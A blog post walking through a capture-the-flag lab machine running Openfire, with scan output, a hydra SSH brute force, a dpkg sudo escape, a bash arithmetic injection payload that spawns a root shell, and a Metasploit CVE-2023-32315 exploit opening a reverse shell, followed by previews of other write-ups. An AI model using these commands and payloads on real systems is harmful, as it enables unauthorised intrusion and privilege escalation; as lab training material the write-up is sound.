CHOCOLATEFIRE MACHINE

 

 

 CHOCOLATEFIRE



First of all, we have to execute ping and see the connection between attacker machine and vulnerable machine as you can see below.

┌──(root㉿kali)-[/home/kali]
└─# ping -c 3 172.17.0.2
PING 172.17.0.2 (172.17.0.2) 56(84) bytes of data.
64 bytes from 172.17.0.2: icmp_seq=1 ttl=64 time=0.034 ms
64 bytes from 172.17.0.2: icmp_seq=2 ttl=64 time=0.074 ms
64 bytes from 172.17.0.2: icmp_seq=3 ttl=64 time=0.062 ms

--- 172.17.0.2 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2044ms
rtt min/avg/max/mdev = 0.034/0.056/0.074/0.016 ms

Once the host was identified, Nmap, a port scanning tool, was used to discover which services were running on the machine. The scan revealed port 9090 (HTTP) and port 22 (SSH) was open
┌──(root㉿kali)-[/home/kali]
└─# nmap -n -Pn -p- --min-rate 5000 -sV -vvv 172.17.0.2 2>/dev/null
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-26 16:19 CET
NSE: Loaded 47 scripts for scanning.
Initiating ARP Ping Scan at 16:19
Scanning 172.17.0.2 [1 port]
Completed ARP Ping Scan at 16:19, 0.05s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 16:19
Scanning 172.17.0.2 [65535 ports]
Discovered open port 22/tcp on 172.17.0.2
Discovered open port 5262/tcp on 172.17.0.2
Discovered open port 5263/tcp on 172.17.0.2
Discovered open port 9090/tcp on 172.17.0.2
Discovered open port 5223/tcp on 172.17.0.2
Discovered open port 5275/tcp on 172.17.0.2
Discovered open port 5269/tcp on 172.17.0.2
Discovered open port 7777/tcp on 172.17.0.2
Discovered open port 5222/tcp on 172.17.0.2
Discovered open port 5270/tcp on 172.17.0.2
Discovered open port 5276/tcp on 172.17.0.2
Discovered open port 7070/tcp on 172.17.0.2
Completed SYN Stealth Scan at 16:19, 0.72s elapsed (65535 total ports)
Initiating Service scan at 16:19
Scanning 12 services on 172.17.0.2
Completed Service scan at 16:22, 156.28s elapsed (12 services on 1 host)
NSE: Script scanning 172.17.0.2.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 16:22
Completed NSE at 16:22, 7.03s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 16:22
Completed NSE at 16:22, 1.04s elapsed
Nmap scan report for 172.17.0.2
Host is up, received arp-response (0.0000040s latency).
Scanned at 2025-10-26 16:19:43 CET for 165s
Not shown: 65523 closed tcp ports (reset)
PORT     STATE SERVICE        REASON         VERSION
22/tcp   open  ssh            syn-ack ttl 64 OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
5222/tcp open  jabber         syn-ack ttl 64 Ignite Realtime Openfire Jabber server 3.10.0 or later
5223/tcp open  ssl/hpvirtgrp? syn-ack ttl 64
5262/tcp open  jabber         syn-ack ttl 64 Ignite Realtime Openfire Jabber server 3.10.0 or later
5263/tcp open  ssl/unknown    syn-ack ttl 64
5269/tcp open  xmpp           syn-ack ttl 64 Wildfire XMPP Client
5270/tcp open  xmp?           syn-ack ttl 64
5275/tcp open  jabber         syn-ack ttl 64
5276/tcp open  ssl/unknown    syn-ack ttl 64
7070/tcp open  http           syn-ack ttl 64 Jetty
7777/tcp open  socks5         syn-ack ttl 64 (No authentication; connection failed)
9090/tcp open  http           syn-ack ttl 64 Jetty
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5275-TCP:V=7.95%I=7%D=10/26%Time=68FE3C29%P=x86_64-pc-linux-gnu%r(R
SF:PCCheck,9B,"<stream:error\x20xmlns:stream=\"http://etherx\.jabber\.org/
SF:streams\"><not-well-formed\x20xmlns=\"urn:ietf:params:xml:ns:xmpp-strea
SF:ms\"/></stream:error></stream:stream>");
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 165.57 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)

Here we can try doing login with default credentials which are:
User: admin
Password:admin 
We have got access control panel to openfire as you can see in the second below.


Now, as we have the user, we are going to trying get the password as you can see below which credentials are: 

User: chocolatechingon password: chocolate

┌──(root㉿kali)-[/home/kali]
└─# hydra -l chocolatitochingon -P /usr/share/wordlists/rockyou.txt ssh://172.17.0.2
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-10-26 16:37:51
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://172.17.0.2:22/
[22][ssh] host: 172.17.0.2   login: chocolatitochingon   password: chocolate
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-10-26                                     

Now, we are going to conect via ssh as you can see below.                              

┌──(root㉿kali)-[/home/kali]
└─# ssh chocolatitochingon@172.17.0.2 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@    WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!     @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that a host key has just been changed.
The fingerprint for the ED25519 key sent by the remote host is
SHA256:srPJMJ55mxvWYy2CYtwvvGEQMp4zxtxrMEZho0IlaGU.
Please contact your system administrator.
Add correct host key in /root/.ssh/known_hosts to get rid of this message.
Offending ECDSA key in /root/.ssh/known_hosts:3
  remove with:
  ssh-keygen -f '/root/.ssh/known_hosts' -R '172.17.0.2'
Host key for 172.17.0.2 has changed and you have requested strict checking.
Host key verification failed.                           

In addition, we have to remove the ssh because the connection has changed with this command which you can see below.    

┌──(root㉿kali)-[/home/kali]
└─# ssh-keygen -f '/root/.ssh/known_hosts' -R '172.17.0.2'
# Host 172.17.0.2 found: line 1
# Host 172.17.0.2 found: line 2
# Host 172.17.0.2 found: line 3
/root/.ssh/known_hosts updated.
Original contents retained as /root/.ssh/known_hosts.old

Now, we are going to conect via ssh as you can see below                                          

┌──(root㉿kali)-[/home/kali]
└─#ssh chocolatitochingon@172.17.0.2  

The authenticity of host '172.17.0.2 (172.17.0.2)' can't be established.
ED25519 key fingerprint is SHA256:srPJMJ55mxvWYy2CYtwvvGEQMp4zxtxrMEZho0IlaGU.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.17.0.2' (ED25519) to the list of known hosts.
chocolatitochingon@172.17.0.2's password: 
Linux d54443f4a3e5 6.16.8+kali-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.16.8-1kali1 (2025-09-24) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jun 25 11:30:12 2024 from 172.17.0.1
chocolatitochingon@d54443f4a3e5:~$ sudo -l
Matching Defaults entries for chocolatitochingon on d54443f4a3e5:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Now, when we have executed sudo -l command, we can show that the vulnerable path is which you can see below.
User chocolatitochingon may run the following commands on d54443f4a3e5:
    (pinguinacio) NOPASSWD: /usr/bin/dpkg
chocolatitochingon@d54443f4a3e5:~$ 

Let's go to gtobins in this link:

https://gtfobins.github.io/gtfobins/dpkg/#sudo



chocolatitochingon@d54443f4a3e5:~$  sudo -u "pinguinacio" /usr/bin/dpkg -l
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name                     Version                      Architecture Description
+++-========================-============================-============-=======================
====================================================
ii  adduser                  3.118                        all          add and remove users an
d groups
ii  apt                      2.2.4                        amd64        commandline package ma
ager
ii  base-files               11.1+deb11u3                 amd64        Debian base system mis
ellaneous files
ii  base-passwd              3.5.51                       amd64        Debian base system mas
er password and group files
ii  bash                     5.1-2+b3                     amd64        GNU Bourne Again SHell
ii  bsdutils                 1:2.36.1-8+deb11u1           amd64        basic utilities from 4
4BSD-Lite
ii  ca-certificates          20210119                     all          Common CA certificates
ii  coreutils                8.32-4+b1                    amd64        GNU core utilities
ii  dash                     0.5.11+git20200708+dd9ef66-5 amd64        POSIX-compliant shell
ii  dbus                     1.12.28-0+deb11u1            amd64        simple interprocess me
saging system (daemon and utilities)
!/bin/bash

Now we are other user whose name's pinguinacio and we will have to execute again sudo -l as you can see below.

pinguinacio@d54443f4a3e5:/home/chocolatitochingon$ sudo -l
Matching Defaults entries for pinguinacio on d54443f4a3e5:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User pinguinacio may run the following commands on d54443f4a3e5:
    (ALL) NOPASSWD: /bin/bash /home/pinguinacio/script.sh

pinguinacio@d54443f4a3e5:~$ sudo -l
Matching Defaults entries for pinguinacio on d54443f4a3e5:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

In addition, we have to go to /bin/bash /home/pinguinacio/script.sh where we will have escalate privileges.

User pinguinacio may run the following commands on d54443f4a3e5:
    (ALL) NOPASSWD: /bin/bash /home/pinguinacio/script.sh
#!/bin/bash

read -rp "Ingrese el número 1 para hacer un backup de tus archivos: " numero

if [[ "$numero" -eq 1 ]]
then
    echo "El número ingresado es igual a 1"
    echo "Intentando copiar archivos al directorio /opt..."
    cp * /opt
    echo "Copia completada."
else
    echo "El número ingresado no es igual a 1. No se realizará ninguna operación."
fi
As we can execute a number, we should be able to  execute to escalate privileges as you can see below.

a[$(whoami>&2)]+42
pinguinacio@d54443f4a3e5:~$ sudo /bin/bash /home/pinguinacio/script.sh
Ingrese el número 1 para hacer un backup de tus archivos: a[$(whoami>&2)]+42       
root

pinguinacio@d54443f4a3e5:~$ sudo /bin/bash /home/pinguinacio/script.sh
Ingrese el número 1 para hacer un backup de tus archivos: ^C
pinguinacio@d54443f4a3e5:~$ sudo /bin/bash /home/pinguinacio/script.sh
Ingrese el número 1 para hacer un backup de tus archivos: a[$(/bin/bash >&2)]+42  
root@d54443f4a3e5:/home/pinguinacio# pwd
/home/pinguinacio

Gotha! we have been converted in root as you can see below.
root@d54443f4a3e5:/home/pinguinacio# whoami

root
root@d54443f4a3e5:/home/pinguinacio# 

Automate process

This method is automate which is esaier than the other method

First of all, we have to open msfconsole and we will search exploit openfire 
┌──(root㉿kali)-[/home/kali]
└─# msfconsole -q
msf > search exploit openfire

Matching Modules
================

   #  Name                                                        Disclosure Date  Rank       Check  Description
   -  ----                                                        ---------------  ----       -----  -----------
   0  exploit/multi/http/openfire_auth_bypass                     2008-11-10       excellent  Yes    Openfire Admin Console Authentication Bypass
   1    \_ target: Java Universal                                 .                .          .      .
   2    \_ target: Windows x86 (Native Payload)                   .                .          .      .
   3    \_ target: Linux x86 (Native Payload)                     .                .          .      .
   4  exploit/multi/http/openfire_auth_bypass_rce_cve_2023_32315  2023-05-26       excellent  Yes    Openfire authentication bypass with RCE plugin


Interact with a module by name or index. For example info 4, use 4 or use exploit/multi/http/openfire_auth_bypass_rce_cve_2023_32315

Now we will should have this steps as you can see below:

1. Write use 4 which exploit is exploit/multi/http/openfire_auth_bypass_rce_cve_2023_32315 

2. Set up payload with the command set payload java/shell/reverse_tcp 

3.  Write command show options

4.  Set up  the reverse shell which we receive the conection with set LHOST 172.17.0.1

5. Set up the vulnerable machine of IP ADDRESS with set RHOST 172.17.0.2

6. Use exploit to execute the module
msf > use 4
[*] Using configured payload java/shell/reverse_tcp
msf exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > set payload java/shell/reverse_tcp 
payload => java/shell/reverse_tcp
msf exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > show options 

Module options (exploit/multi/http/openfire_auth_bypass_rce_cve_2023_32315):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   ADMINNAME                      no        Openfire admin user name, (default: random)
   PLUGINAUTHOR                   no        Openfire plugin author, (default: random)
   PLUGINDESC                     no        Openfire plugin description, (default: random)
   PLUGINNAME                     no        Openfire plugin base name, (default: random)
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies
                                            : sapni, socks4, http, socks5, socks5h
   RHOSTS                         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basic
                                            s/using-metasploit.html
   RPORT         9090             yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /                yes       The base path to the web application
   VHOST                          no        HTTP server virtual host

Payload options (java/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Java Universal

View the full module info with the info, or info -d command.

msf exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > set LHOST 172.17.0.1
LHOST => 172.17.0.1
msf exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > set RHOST 172.17.0.2
RHOST => 172.17.0.2
msf exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > exploit 
[*] Started reverse TCP handler on 172.17.0.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Openfire version is 4.7.4
[*] Grabbing the cookies.
[*] JSESSIONID=node0u0y4ycjdrf05o0oijv8o86jp7.node0
[*] csrf=IKrSlD5XrB7e741
[*] Adding a new admin user.
[*] Logging in with admin user "dormpxjyluv" and password "VZTMa0bA".
[*] Upload and execute plugin "0oOg1A1aNKX0bpA" with payload "java/shell/reverse_tcp".
[*] Sending stage (2952 bytes) to 172.17.0.2
[!] Plugin "0oOg1A1aNKX0bpA" need manually clean-up via Openfire Admin console.
[!] Admin user "dormpxjyluv" need manually clean-up via Openfire Admin console.
[*] Command shell session 1 opened (172.17.0.1:4444 -> 172.17.0.2:59914) at 2025-10-26 17:11:22 +0100

help

Meta shell commands
===================

    Command     Description
    -------     -----------
    help        Help menu
    background  Backgrounds the current shell session
    sessions    Quickly switch to another session
    resource    Run a meta commands script stored in a local file
    shell       Spawn an interactive shell (*NIX Only)
    download    Download files
    upload      Upload files
    source      Run a shell script on remote machine (*NIX Only)
    irb         Open an interactive Ruby shell on the current session
    pry         Open the Pry debugger on the current session
    .<command>  Prefix any built-in command on this list with a '.' to execute in the underlying shell (ex: .help)

For more info on a specific command, use <command> -h or help <command>.

background

Background session 1? [y/N]  y
msf exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > sessions 

Active sessions
===============

  Id  Name  Type             Information  Connection
  --  ----  ----             -----------  ----------
  1         shell java/java               172.17.0.1:4444 -> 172.17.0.2:59914 (172.17.0.2)

msf exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > sessions -i 1
[*] Starting interaction with 1...

pwd
/mnt/openfire/bin
shell   
[*] Trying to find binary 'python' on the target machine
[-] python not found
[*] Trying to find binary 'python3' on the target machine
[-] python3 not found
[*] Trying to find binary 'script' on the target machine
[*] Found script at /usr/bin/script
[*] Using `script` to pop up an interactive shell
ls
ls
extra  openfire  openfire.sh  openfirectl
# whoami
whoami

Gotha! we are root user.

root

Thank you very much for reading this article

I hope you liked and learned something new

This article has been done with ethical proposes

Good Hack 
 

Comments

Post a Comment

Entradas Populares

INTERNAL

Image
 INTERNAL(TRYHACKME) First of all, let's go execute nmap command to identify alives ports and version with this host 192.168.88.6 as you can see below. Key open ports and services include: Web Servers: Port 80 (HTTP):  Running  Apache2 Ubuntu Default Page . It supports  OPTIONS ,  TRACE  (flagged as potentially risky),  GET ,  HEAD , and  POST  methods. The webpage title is " INTERNAL ". SSH Protocol Port 22 (SSH): Running Linux . ┌──(root㉿kali)-[/home/luis/Descargas] └─# nmap -n -Pn -p- --min-rate 5000 -sC 10.10.216.78 -vvv Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-07 12:06 CEST NSE: Loaded 126 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 2) scan. Initiating NSE at 12:06 Completed NSE at 12:06, 0.00s elapsed NSE: Starting runlevel 2 (of 2) scan. Initiating NSE at 12:06 Completed NSE at 12:06, 0.00s elapsed Initiating SYN Stealth Scan at 12:06 Scanning 10.10.216.78 [65535 ports] Discove...
Read more »

TOR WEB BROWSER

Image
  TOR WEB BROWSER TOR INSTALLATION First of all; we're going to this link from the oficial webpage: https://www.torproject.org/es/download/   where we have to download this version our laptop, Windows and Linux but in my case I've had to download for Windows 10. When the program is installed we will press execute and we'll follow step by step:   We'll open and we'll see this image where you have to select the language and select ok to continue the instal l ation. In addition, we'll select the location wherever you want install the program, but in my case I prefer the default location and you'll able to select wherever you want. Now, we will be started the installation process and when it finished you will be able to see the picture below: TOR CONNECT If the process has been successful, you will be able to connect with the connect button which you can observe in both pictures below: ADD A BRIDGE ...
Read more »

activedirectory

Image
ACTIVEDIRECTORY (TRYHACKME) First of all, let’s go to execute nmap toolkit and we'll be able to start the enumeration of the ports as you can see below with this command: sudo nmap -n -Pn -p- --min-rate 5000 10.10.135.154 -vvv -sC -sV This revealed several open TCP ports with associated services, including: DNS (53),  HTTP  (80),  Kerberos (88),  RPC (135),  NetBIOS-SSN (139),  SMB (445),  RDP (3389),  WS-Management (5985)  LDAP (389, 636, 3268, 3269) Moreover, service and NSE script detection provided valuable information about the services running on these ports, such as IIS 10.0, Microsoft Windows Kerberos , Active Directory LDAP , and Microsoft Terminal Services . The SSL/TLS certificate information on port 3389 indicated the common name AttacktiveDirectory.spookysec.local, reinforcing the target as an Active Directory server. rdp-ntlm-info also provided details about the domain (THM-AD) and computer name (ATTACKTIVEDIREC) as you can se...
Read more »

PICKLE RICK

Image
  PICKLE RICK I'm going to realize the resolution of the machine Level Easy from Tryhackme called  Pickle Rick  which is a machine so easy to realize. First of all,  we can observe that in the picture bellow we have some inforamtion and I'm going to execute control +u  and we can see in the second picture below that we've obtained a  Username. I'm going to gathering information about machine and I have to enter in the Linux terminal and I must introduce this command which you canobserve in the picture below:   gobuster dir -u(url) http://10.10.99.188/ -w(password dictionary)  /usr/share/wordlist/dirb/common.txt -x (formato que quereos que busque) .txt*, .php, .login,  In this case, we can observe that scan has discovered this 4 webpages: /assests /denied.php /index.html /login.php /robots.txt Now, we can see such as the web page from /robots.txt   it seems the password in the picture below. Now, we've discovered this login web page...
Read more »

Metasploit Framework

Image
 METASPLOIT FRAMEWORK USE TO  AUXILIARY MODULE FROM METASPLOIT First of all, I have used the auxiliary modules from Metasploit-Framework which could allow me Scanning, see ports, SO version, vulnerability in applications etc, where you can see at the bottom of the picture if  I use this module whose name is: auxiliary/scanner/discovery/arp_sweep  (To verify the IPs listening in the network) Now, we can observe that when I have selected in the auxiliary module I have had to do this set up  that we can observe in the second page below: INTERFACE : This I've set up the network interface that in my case is the eth0 interface. RHOSTS :This I've set up the IP Address which I am finding out that in my case is 192.168.100.0/24 (all the IP Address from network that could be possible which I am analyzing). THREADS : Are the threads; it's the fast  that I want to analyze the IP Addresses but in my case there are 15 threads because I want to analize as fast as possible...
Read more »

HOSTING

Image
HOSTING First of all, let's go to hosting machine from active directory, for it  using arp-scan to discover active hosts on the local network, identifying 192.168.88.8 as you can see in below. ┌──(kali㉿kali)-[~] └─$ sudo arp-scan -I eth0 --localnet Interface: eth0, type: EN10MB, MAC: 08:00:27:43:73:bc, IPv4: 192.168.88.5 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.88.1 d8:44:89:50:2d:a3 (Unknown) 192.168.88.8 08:00:27:98:d4:bf PCS Systemtechnik GmbH 192.168.88.9 00:e0:4c:69:66:4a REALTEK SEMICONDUCTOR CORP. 3 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 2.075 seconds (123.37 hosts/sec). 3 responded ┌──(kali㉿kali)-[~] └─$ ping -c1 192.168.88.8 PING 192.168.88.8 (192.168.88.8) 56(84) bytes of data. 64 bytes from 192.168.88.8: icmp_seq=1 ttl=128...
Read more »

LOVE

Image
BUSCALOVE First of all, I am going to do this machine from cybersecurity labs called BuscaLove which is easy Level. For it, let’s go to open Linux terminal and we have to write the command when we can see in the picture below. cd Descargas In addition, we have to depress the unzip file whose name’s buscalove.zip you can see in the picture below. Now we have to deploy the vulnerability machine whose command is sudo bash auto_deploy.sh buscalove.tar we can see in the picture below. On the other hand, to start the attack at virtual machine, we must verify if the attacker machine is in the same range of IP Address and we have to introduce this command which is ping -c 3 172.18.0.2 we can see in the picture below. As I,ve just seen the IP Address it’s in the same range of my IP Address we have to introduce the command with nmap tool which is nmap -n -Pn 172.18.0.2 -p- - -min-rate 4000 -vvv( here you can see in this picture the scanner) but I’ve got it 2 ports: 22: open ssh 80: open http No...
Read more »

CHANGE MACHINE

Image
CHANGE  First of all, let's go to hosting machine from active directory, for it  using  arp-scan  to discover active hosts on the local network, identifying  192.168.88.8   as you can see in below . ┌──(root㉿kali)-[/home/luis] └─# arp-scan -I eth0 --localnet Interface: eth0, type: EN10MB, MAC: 08:00:27:4d:8a:0f, IPv4: 192.168.88.6 WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.88.1 d8:44:89:50:2d:a3 (Unknown) 192.168.88.4 00:e0:4c:97:01:a7 (Unknown) 192.168.88.5 00:d8:61:fa:c0:4a (Unknown) 192.168.88.7 08:00:27:b1:ae:9f (Unknown) 4 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.848 seconds (138.53 hosts/sec). 4 responded Now, let's go execute nmap command to identify alives ports and version with this host  192.168.88...
Read more »